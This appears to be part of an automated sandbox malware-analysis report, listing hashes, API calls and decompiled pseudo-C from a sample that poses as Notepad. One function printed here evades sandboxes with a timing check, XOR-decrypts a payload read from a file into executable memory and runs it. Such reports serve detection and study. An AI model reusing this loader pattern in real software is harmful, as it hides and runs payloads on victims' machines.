                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LongWindow
                    • String ID:
                    • API String ID: 1378638983-0
                    • Opcode ID: 94881425c9b3250c3766231da063c55eb4b66063f4e5d56f77f29b877563bfb3
                    • Instruction ID: 4cc5af12b9d306da2aeb595a0d1d74211d148602bc0d54160fda880b9d47fc58
                    • Opcode Fuzzy Hash: 94881425c9b3250c3766231da063c55eb4b66063f4e5d56f77f29b877563bfb3
                    • Instruction Fuzzy Hash: FE1125B58006089FDB10CF9AD584BDEBBF8EB48324F20845AE818B7601C374A945CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetWindowLongW.USER32(?,?,?), ref: 0319FE9D
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LongWindow
                    • String ID:
                    • API String ID: 1378638983-0
                    • Opcode ID: 759909fbf5b2ee03936ceba5836906211244257520f41617f7c456afafb9ffa8
                    • Instruction ID: 80c6af10788a86939e3c5e53c0c1f23d3cbc76d5d7649ebf24786e4d255f466b
                    • Opcode Fuzzy Hash: 759909fbf5b2ee03936ceba5836906211244257520f41617f7c456afafb9ffa8
                    • Instruction Fuzzy Hash: 3411D3B58006499FDB10CF9AD584BDEFBF8EB48324F20855AE959B7640C374A944CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00407D48(long _a4) {
                    				void* _t4;
                    				void* _t6;
                    				long _t8;
                    
                    				_t8 = _a4;
                    				if(_t8 > 0xffffffe0) {
                    					L7:
                    					 *((intOrPtr*)(E0040649B())) = 0xc;
                    					__eflags = 0;
                    					return 0;
                    				}
                    				if(_t8 == 0) {
                    					_t8 = _t8 + 1;
                    				}
                    				while(1) {
                    					_t4 = RtlAllocateHeap( *0x4163ec, 0, _t8); // executed
                    					if(_t4 != 0) {
                    						break;
                    					}
                    					__eflags = E004051C4();
                    					if(__eflags == 0) {
                    						goto L7;
                    					}
                    					_t6 = E004087B5(__eflags, _t8);
                    					__eflags = _t6;
                    					if(_t6 == 0) {
                    						goto L7;
                    					}
                    				}
                    				return _t4;
                    			}







                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,00406E77,?,?,00406E77,00000220,?,00000000,?), ref: 00407D7A
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                    • Instruction ID: 65cd16bcdc1b8bd721fcda30d9bca64849d6530a3f0c9080c4415b1d98ca3938
                    • Opcode Fuzzy Hash: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                    • Instruction Fuzzy Hash: 9FE0A931A0862456EA202B269C00F6B3A498F823B0B154233EC05B62D2DA7DE80182AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.564856427.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_151d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0d21f60265ee812c2f5d48addb479a3b4a5a2c483b711a2960e18f191fe5217e
                    • Instruction ID: 1263492b8db09c10e8d763ec9ef7a016939faa06df262c4c96335c3bed3a5aae
                    • Opcode Fuzzy Hash: 0d21f60265ee812c2f5d48addb479a3b4a5a2c483b711a2960e18f191fe5217e
                    • Instruction Fuzzy Hash: D921D675504244DFEB16DF58D9C4B2ABFB5FB88314F248969E9090F20AC33AD855CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.564890256.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_152d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4239327002d159527ea8b0c7c08f0e6c710dc903e35fcae3a291790c69d4b03b
                    • Instruction ID: 37d39d0353ca0e1869579c4784396d09f20b319cf3db207fcf7e47f625a147d3
                    • Opcode Fuzzy Hash: 4239327002d159527ea8b0c7c08f0e6c710dc903e35fcae3a291790c69d4b03b
                    • Instruction Fuzzy Hash: 85210A76504240DFDB05CF98D5C0B15BBB5FB86324F20C96DE9494F282C33AD806CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.564890256.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_152d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 70740b9bf10be8b5af5fe852880812577bc58c6e16ae37b199e9738621cf7621
                    • Instruction ID: f9fcdf123ba92d4b50a2f654e5349c9294a4e2709e52a9ad2e8e23faef6ce81e
                    • Opcode Fuzzy Hash: 70740b9bf10be8b5af5fe852880812577bc58c6e16ae37b199e9738621cf7621
                    • Instruction Fuzzy Hash: C0210376504240DFDB15CF58D4C0B2ABBB5FB85354F20C96DE9490F296D33ED806CA61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.564890256.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_152d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 02df92deb88aa4e401b1e36c0cb212451a73363a88003ad91d2cdfdb291b86a7
                    • Instruction ID: c52bb1e09371545ee2e6b4822b62dd77aefc1b7f287d8b93fe0e1bc2fa1b842c
                    • Opcode Fuzzy Hash: 02df92deb88aa4e401b1e36c0cb212451a73363a88003ad91d2cdfdb291b86a7
                    • Instruction Fuzzy Hash: 4D2183765083808FD713CF24D590715BF71FB46214F28C5DAD8498F6A7C33A980ACB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.564856427.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_151d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 982c360c003d4f1ee582f2a962539945f00b5747649ba5e4ae048a2b1d742921
                    • Instruction ID: f8e6969b260087d4931c0b283e99e6ab188b7f0350facbbb5513eaf5387a357b
                    • Opcode Fuzzy Hash: 982c360c003d4f1ee582f2a962539945f00b5747649ba5e4ae048a2b1d742921
                    • Instruction Fuzzy Hash: 8711AF76504280DFDB12CF54D9C4B1ABF72FB84324F24C6A9D8494B61BC33AD456CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.564890256.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_152d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a6517b0c51532ab1228694df95b8b3b3c13daef207f256e768b7618657812813
                    • Instruction ID: 9c053b692719b38f86349e8f1fdfe27e75c4234306f709ad6b1cb147acf55a9e
                    • Opcode Fuzzy Hash: a6517b0c51532ab1228694df95b8b3b3c13daef207f256e768b7618657812813
                    • Instruction Fuzzy Hash: 32118B76904280DFDB12CF54D5C4B19BBB2FB86324F24C6AED8494F696C33AD44ACB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.564856427.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_151d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6bd495fa7026156ed20a0bf62f668f449cf081f02a3f0ec65e7d89a345351400
                    • Instruction ID: eb4f46d2af22872582649787bb8bbeeb936370eb9e766edbad9b96faf7282788
                    • Opcode Fuzzy Hash: 6bd495fa7026156ed20a0bf62f668f449cf081f02a3f0ec65e7d89a345351400
                    • Instruction Fuzzy Hash: 6401FC714043409AF7124A6ACCC8766BFE8FF413A4F14C45AED441F246D3799445CAB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.564856427.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_151d000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f352da9157bce432ed4f3e7e5da2eddca07bcff99dcc2c211819bcfb3f25a32e
                    • Instruction ID: c7c2623fbfbca7ca31c360fedc0f8a4b9c4066e4382c4247b2a38ea0a5a476a3
                    • Opcode Fuzzy Hash: f352da9157bce432ed4f3e7e5da2eddca07bcff99dcc2c211819bcfb3f25a32e
                    • Instruction Fuzzy Hash: B701807140D3C05FE7138B258C94B56BFB8EF43224F1981CBD9848F297D2688808CB72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E002828A0(signed long long __fp0, struct HINSTANCE__* _a4, intOrPtr _a12, int _a16) {
                    				struct _WNDCLASSEXW _v56;
                    				intOrPtr _v72;
                    				intOrPtr _v76;
                    				intOrPtr _v80;
                    				struct tagMONITORINFO _v104;
                    				struct tagMSG _v132;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t46;
                    				void* _t48;
                    				struct HINSTANCE__* _t55;
                    				int _t57;
                    				struct HMONITOR__* _t62;
                    				intOrPtr _t64;
                    				struct HWND__* _t66;
                    				int _t76;
                    				int _t79;
                    				int _t80;
                    				int _t81;
                    				void* _t88;
                    				void* _t90;
                    				void* _t99;
                    				intOrPtr* _t100;
                    				void* _t105;
                    				intOrPtr _t108;
                    				signed int _t114;
                    				int _t117;
                    				void* _t128;
                    				intOrPtr* _t130;
                    				int _t131;
                    				intOrPtr* _t135;
                    				void* _t136;
                    				int _t140;
                    				struct HACCEL__* _t141;
                    				void* _t144;
                    				signed int _t145;
                    				void* _t147;
                    				signed long long _t156;
                    
                    				_t156 = __fp0;
                    				_t147 = (_t145 & 0xfffffff8) - 0x7c;
                    				_t100 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "GetTickCount");
                    				_v132.wParam = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "Sleep");
                    				_t130 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "VirtualAlloc");
                    				_t46 =  *_t100(_t128, _t136, _t99);
                    				_t138 = _t46;
                    				_v132.wParam(0x2be);
                    				_t48 =  *_t100();
                    				_t151 = _t48 - _t46 - 0x2bc;
                    				if(_t48 - _t46 >= 0x2bc) {
                    					_t88 = E00282D3E(_a12, L"rb");
                    					_t105 = _t88;
                    					E0028335F(_t105, _t130, _t138, _t151);
                    					_t90 = E00283270(_t105, _t130, _t138, _t151);
                    					_t144 = _t90;
                    					E0028335F(_t105, _t130, _t144, _t151);
                    					_t135 =  *_t130(0, _t144, 0x3000, 0x40, _t105, 0, 0, _t105, _t105, 0, 2);
                    					E002830BF(_t135, _t144, 1, _t105);
                    					_t147 = _t147 + 0x34;
                    					_t114 = 0;
                    					if(_t144 != 0) {
                    						do {
                    							_t10 = _t114 - (0xaaaaaaab * _t114 >> 0x20 >> 3) + (0xaaaaaaab * _t114 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t114 >> 0x20 >> 3) + (0xaaaaaaab * _t114 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t114 >> 0x20 >> 3) + (0xaaaaaaab * _t114 >> 0x20 >> 3) * 2 + (0xaaaaaaab * _t114 >> 0x20 >> 3) + (0xaaaaaaab * _t114 >> 0x20 >> 3) * 2 + "248058040134"; // 0x30383432
                    							_t115 =  *_t10;
                    							 *(_t114 + _t135) =  *(_t114 + _t135) ^  *_t10;
                    							_t114 = _t114 + 1;
                    						} while (_t114 < _t144);
                    					}
                    					 *_t135();
                    				}
                    				 *0x295f64 = RegisterWindowMessageW(L"commdlg_FindReplace");
                    				E00285760(0x2970e0, 0, 0x11f4);
                    				 *0x2970e0 = _a4;
                    				E00281640(_t115, _t156);
                    				E00285760( &_v56, 0, 0x30);
                    				_t55 =  *0x2970e0;
                    				_v56.cbSize = 0x30;
                    				_v56.lpfnWndProc = E00282340;
                    				_v56.hInstance = _t55;
                    				_v56.hIcon = LoadIconW(_t55, 0x300);
                    				_t57 = GetSystemMetrics(0x32);
                    				_v56.hIconSm = LoadImageW( *0x2970e0, 0x300, 1, GetSystemMetrics(0x31), _t57, 0x8000);
                    				_v56.hCursor = LoadCursorW(0, 0x7f00);
                    				_v56.hbrBackground = 6;
                    				_v56.lpszMenuName = 0x201;
                    				_v56.lpszClassName = L"Notepad";
                    				_t62 = RegisterClassExW( &_v56);
                    				if(_t62 != 0) {
                    					__imp__MonitorFromRect(0x295f68, 1);
                    					_v104.cbSize = 0x28;
                    					GetMonitorInfoW(_t62,  &_v104);
                    					_t117 =  *0x295f68; // 0x0
                    					_t140 =  *0x295f6c; // 0x0
                    					_t64 =  *0x295f74; // 0x0
                    					_t108 =  *0x295f70; // 0x0
                    					_t131 = _t117;
                    					__eflags = _t117 - _v76;
                    					if(_t117 >= _v76) {
                    						L10:
                    						_t140 = 0x80000000;
                    						_t131 = 0x80000000;
                    					} else {
                    						__eflags = _t140 - _v72;
                    						if(_t140 >= _v72) {
                    							goto L10;
                    						} else {
                    							__eflags = _t108 - _v104.rcWork;
                    							if(_t108 < _v104.rcWork) {
                    								goto L10;
                    							} else {
                    								__eflags = _t64 - _v80;
                    								if(_t64 < _v80) {
                    									goto L10;
                    								}
                    							}
                    						}
                    					}
                    					_t66 = CreateWindowExW(0, L"Notepad", L"Notepad", 0xcf0000, _t131, _t140, _t108 - _t117, _t64 -  *0x295f6c, 0, 0,  *0x2970e0, 0);
                    					 *0x2970e4 = _t66;
                    					__eflags = _t66;
                    					if(_t66 == 0) {
                    						 *0x280000();
                    						ExitProcess(1);
                    					}
                    					E00281E60();
                    					 *0x280000();
                    					ShowWindow( *0x2970e4, _a16);
                    					UpdateWindow( *0x2970e4);
                    					DragAcceptFiles( *0x2970e4, 1);
                    					E00282690(GetCommandLineW());
                    					_t141 = LoadAcceleratorsW(_a4, 0x203);
                    					_t76 = GetMessageW( &_v132, 0, 0, 0);
                    					__eflags = _t76;
                    					if(_t76 != 0) {
                    						do {
                    							_t79 = IsDialogMessageW( *0x2970e8,  &_v132);
                    							__eflags = _t79;
                    							if(_t79 == 0) {
                    								_t81 = TranslateAcceleratorW( *0x2970e4, _t141,  &_v132);
                    								__eflags = _t81;
                    								if(_t81 == 0) {
                    									TranslateMessage( &_v132);
                    									DispatchMessageW( &_v132);
                    								}
                    							}
                    							_t80 = GetMessageW( &_v132, 0, 0, 0);
                    							__eflags = _t80;
                    						} while (_t80 != 0);
                    					}
                    					return _v132.wParam;
                    				} else {
                    					return 0;
                    				}
                    			}












































                    APIs
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTickCount), ref: 002828BC
                    • GetProcAddress.KERNEL32(00000000), ref: 002828C5
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,Sleep), ref: 002828D3
                    • GetProcAddress.KERNEL32(00000000), ref: 002828D6
                    • GetModuleHandleW.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 002828E6
                    • GetProcAddress.KERNEL32(00000000), ref: 002828E9
                    • _fseek.LIBCMT ref: 0028291A
                    • _fseek.LIBCMT ref: 0028292C
                      • Part of subcall function 0028335F: __lock_file.LIBCMT ref: 002833A0
                      • Part of subcall function 0028335F: __fseek_nolock.LIBCMT ref: 002833B1
                    • __fread_nolock.LIBCMT ref: 00282947
                    • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 0028297F
                    • _memset.LIBCMT ref: 00282997
                    • _memset.LIBCMT ref: 002829B5
                    • LoadIconW.USER32 ref: 002829DC
                    • GetSystemMetrics.USER32 ref: 002829F3
                    • GetSystemMetrics.USER32 ref: 002829F8
                    • LoadImageW.USER32 ref: 00282A09
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00282A1D
                    • RegisterClassExW.USER32 ref: 00282A4A
                      • Part of subcall function 00282D3E: __wfsopen.LIBCMT ref: 00282D4B
                    • MonitorFromRect.USER32(00295F68,00000001), ref: 00282A67
                    • GetMonitorInfoW.USER32 ref: 00282A7B
                    • CreateWindowExW.USER32 ref: 00282AE3
                    • ExitProcess.KERNEL32 ref: 00282AFA
                    • ShowWindow.USER32(?,?,?,?,?,?,?,?,?), ref: 00282B15
                    • UpdateWindow.USER32(?), ref: 00282B22
                    • DragAcceptFiles.SHELL32(?,00000001), ref: 00282B31
                    • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?), ref: 00282B37
                    • LoadAcceleratorsW.USER32 ref: 00282B4B
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00282B64
                    • IsDialogMessageW.USER32(?,?), ref: 00282B7B
                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00282B92
                    • TranslateMessage.USER32(?), ref: 00282B9D
                    • DispatchMessageW.USER32 ref: 00282BA8
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00282BB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Message$LoadWindow$AddressHandleModuleProc$MetricsMonitorRegisterSystemTranslate_fseek_memset$AcceleratorAcceleratorsAcceptClassCommandCreateCursorDialogDispatchDragExitFilesFromIconImageInfoLineProcessRectShowUpdate__fread_nolock__fseek_nolock__lock_file__wfsopen
                    • String ID: ($0$GetTickCount$Kernel32.dll$Notepad$Notepad$Sleep$VirtualAlloc$commdlg_FindReplace
                    • API String ID: 660244864-2033289487
                    • Opcode ID: c409cb4264a9b669622cd29afad8c0ed9c91d31143152f1309b75accefe11290
                    • Instruction ID: b6a841668ad9cee587483ff2fed6c380b09105e22d734fb97bb9eab9265952bc
                    • Opcode Fuzzy Hash: c409cb4264a9b669622cd29afad8c0ed9c91d31143152f1309b75accefe11290
                    • Instruction Fuzzy Hash: F081D175661305AFD710EFB1EC8EF5B3BE8EF84B40F10451AFA45972D1DAB0A8148BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E002879C4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                    				intOrPtr _v0;
                    				void* _v804;
                    				intOrPtr _v808;
                    				intOrPtr _v812;
                    				intOrPtr _t6;
                    				intOrPtr _t11;
                    				intOrPtr _t12;
                    				intOrPtr _t13;
                    				long _t17;
                    				intOrPtr _t21;
                    				intOrPtr _t22;
                    				intOrPtr _t25;
                    				intOrPtr _t26;
                    				intOrPtr _t27;
                    				intOrPtr* _t31;
                    				void* _t34;
                    
                    				_t27 = __esi;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t22 = __ecx;
                    				_t21 = __ebx;
                    				_t6 = __eax;
                    				_t34 = _t22 -  *0x294288; // 0xbb40e64e
                    				if(_t34 == 0) {
                    					asm("repe ret");
                    				}
                    				 *0x295d30 = _t6;
                    				 *0x295d2c = _t22;
                    				 *0x295d28 = _t25;
                    				 *0x295d24 = _t21;
                    				 *0x295d20 = _t27;
                    				 *0x295d1c = _t26;
                    				 *0x295d48 = ss;
                    				 *0x295d3c = cs;
                    				 *0x295d18 = ds;
                    				 *0x295d14 = es;
                    				 *0x295d10 = fs;
                    				 *0x295d0c = gs;
                    				asm("pushfd");
                    				_pop( *0x295d40);
                    				 *0x295d34 =  *_t31;
                    				 *0x295d38 = _v0;
                    				 *0x295d44 =  &_a4;
                    				 *0x295c80 = 0x10001;
                    				_t11 =  *0x295d38; // 0x0
                    				 *0x295c34 = _t11;
                    				 *0x295c28 = 0xc0000409;
                    				 *0x295c2c = 1;
                    				_t12 =  *0x294288; // 0xbb40e64e
                    				_v812 = _t12;
                    				_t13 =  *0x29428c; // 0x44bf19b1
                    				_v808 = _t13;
                    				 *0x295c78 = IsDebuggerPresent();
                    				_push(1);
                    				E002879BC(_t14);
                    				SetUnhandledExceptionFilter(0);
                    				_t17 = UnhandledExceptionFilter("(\)");
                    				if( *0x295c78 == 0) {
                    					_push(1);
                    					E002879BC(_t17);
                    				}
                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                    			}




















                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0028ACFA
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0028AD0F
                    • UnhandledExceptionFilter.KERNEL32((\)), ref: 0028AD1A
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0028AD36
                    • TerminateProcess.KERNEL32(00000000), ref: 0028AD3D
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID: (\)
                    • API String ID: 2579439406-2644722814
                    • Opcode ID: 79c1b763d1e6295de655ba4577400732bd1d13d37f295083e9f6f46fd72ae7b8
                    • Instruction ID: 9620e6606564b849e26227014aa917bb265010fab49c45915e8257f0604a37a4
                    • Opcode Fuzzy Hash: 79c1b763d1e6295de655ba4577400732bd1d13d37f295083e9f6f46fd72ae7b8
                    • Instruction Fuzzy Hash: EF21B574A11B28DFD746EF69FC8D6483BB4BB48314F50441BE908973B0E7B059818F65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E00401C83(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                    				char _v0;
                    				struct _EXCEPTION_POINTERS _v12;
                    				intOrPtr _v80;
                    				intOrPtr _v88;
                    				char _v92;
                    				intOrPtr _v608;
                    				intOrPtr _v612;
                    				void* _v616;
                    				intOrPtr _v620;
                    				char _v624;
                    				intOrPtr _v628;
                    				intOrPtr _v632;
                    				intOrPtr _v636;
                    				intOrPtr _v640;
                    				intOrPtr _v644;
                    				intOrPtr _v648;
                    				intOrPtr _v652;
                    				intOrPtr _v656;
                    				intOrPtr _v660;
                    				intOrPtr _v664;
                    				intOrPtr _v668;
                    				char _v808;
                    				char* _t39;
                    				long _t49;
                    				intOrPtr _t51;
                    				void* _t54;
                    				intOrPtr _t55;
                    				intOrPtr _t57;
                    				intOrPtr _t58;
                    				intOrPtr _t59;
                    				intOrPtr* _t60;
                    
                    				_t59 = __esi;
                    				_t58 = __edi;
                    				_t57 = __edx;
                    				if(IsProcessorFeaturePresent(0x17) != 0) {
                    					_t55 = _a4;
                    					asm("int 0x29");
                    				}
                    				E00401E78(_t34);
                    				 *_t60 = 0x2cc;
                    				_v632 = E00402470(_t58,  &_v808, 0, 3);
                    				_v636 = _t55;
                    				_v640 = _t57;
                    				_v644 = _t51;
                    				_v648 = _t59;
                    				_v652 = _t58;
                    				_v608 = ss;
                    				_v620 = cs;
                    				_v656 = ds;
                    				_v660 = es;
                    				_v664 = fs;
                    				_v668 = gs;
                    				asm("pushfd");
                    				_pop( *_t15);
                    				_v624 = _v0;
                    				_t39 =  &_v0;
                    				_v612 = _t39;
                    				_v808 = 0x10001;
                    				_v628 =  *((intOrPtr*)(_t39 - 4));
                    				E00402470(_t58,  &_v92, 0, 0x50);
                    				_v92 = 0x40000015;
                    				_v88 = 1;
                    				_v80 = _v0;
                    				_t28 = IsDebuggerPresent() - 1; // -1
                    				_v12.ExceptionRecord =  &_v92;
                    				asm("sbb bl, bl");
                    				_v12.ContextRecord =  &_v808;
                    				_t54 =  ~_t28 + 1;
                    				SetUnhandledExceptionFilter(0);
                    				_t49 = UnhandledExceptionFilter( &_v12);
                    				if(_t49 == 0 && _t54 == 0) {
                    					_push(3);
                    					return E00401E78(_t49);
                    				}
                    				return _t49;
                    			}



































                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401C8F
                    • IsDebuggerPresent.KERNEL32 ref: 00401D5B
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401D7B
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00401D85
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    • String ID:
                    • API String ID: 254469556-0
                    • Opcode ID: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                    • Instruction ID: 03da4fdce737ae66b50b035683398d13283d912606226935be00c523356d6f7c
                    • Opcode Fuzzy Hash: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                    • Instruction Fuzzy Hash: F4314C75D0131C9BDB10DF61D949BCDBBB8BF08304F1041AAE44CAB290EB745A848F48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E0040207B(signed int __edx) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				intOrPtr _t60;
                    				signed int _t61;
                    				signed int _t62;
                    				signed int _t63;
                    				signed int _t66;
                    				signed int _t67;
                    				signed int _t73;
                    				intOrPtr _t74;
                    				intOrPtr _t75;
                    				intOrPtr* _t77;
                    				signed int _t78;
                    				intOrPtr* _t82;
                    				signed int _t85;
                    				signed int _t90;
                    				intOrPtr* _t93;
                    				signed int _t96;
                    				signed int _t99;
                    				signed int _t104;
                    
                    				_t90 = __edx;
                    				 *0x415c64 =  *0x415c64 & 0x00000000;
                    				 *0x415030 =  *0x415030 | 0x00000001;
                    				if(IsProcessorFeaturePresent(0xa) == 0) {
                    					L23:
                    					return 0;
                    				}
                    				_v20 = _v20 & 0x00000000;
                    				_push(_t74);
                    				_t93 =  &_v40;
                    				asm("cpuid");
                    				_t75 = _t74;
                    				 *_t93 = 0;
                    				 *((intOrPtr*)(_t93 + 4)) = _t74;
                    				 *((intOrPtr*)(_t93 + 8)) = 0;
                    				 *(_t93 + 0xc) = _t90;
                    				_v16 = _v40;
                    				_v8 = _v28 ^ 0x49656e69;
                    				_v12 = _v32 ^ 0x6c65746e;
                    				_push(_t75);
                    				asm("cpuid");
                    				_t77 =  &_v40;
                    				 *_t77 = 1;
                    				 *((intOrPtr*)(_t77 + 4)) = _t75;
                    				 *((intOrPtr*)(_t77 + 8)) = 0;
                    				 *(_t77 + 0xc) = _t90;
                    				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
                    					L9:
                    					_t96 =  *0x415c68; // 0x2
                    					L10:
                    					_t85 = _v32;
                    					_t60 = 7;
                    					_v8 = _t85;
                    					if(_v16 < _t60) {
                    						_t78 = _v20;
                    					} else {
                    						_push(_t77);
                    						asm("cpuid");
                    						_t82 =  &_v40;
                    						 *_t82 = _t60;
                    						 *((intOrPtr*)(_t82 + 4)) = _t77;
                    						 *((intOrPtr*)(_t82 + 8)) = 0;
                    						_t85 = _v8;
                    						 *(_t82 + 0xc) = _t90;
                    						_t78 = _v36;
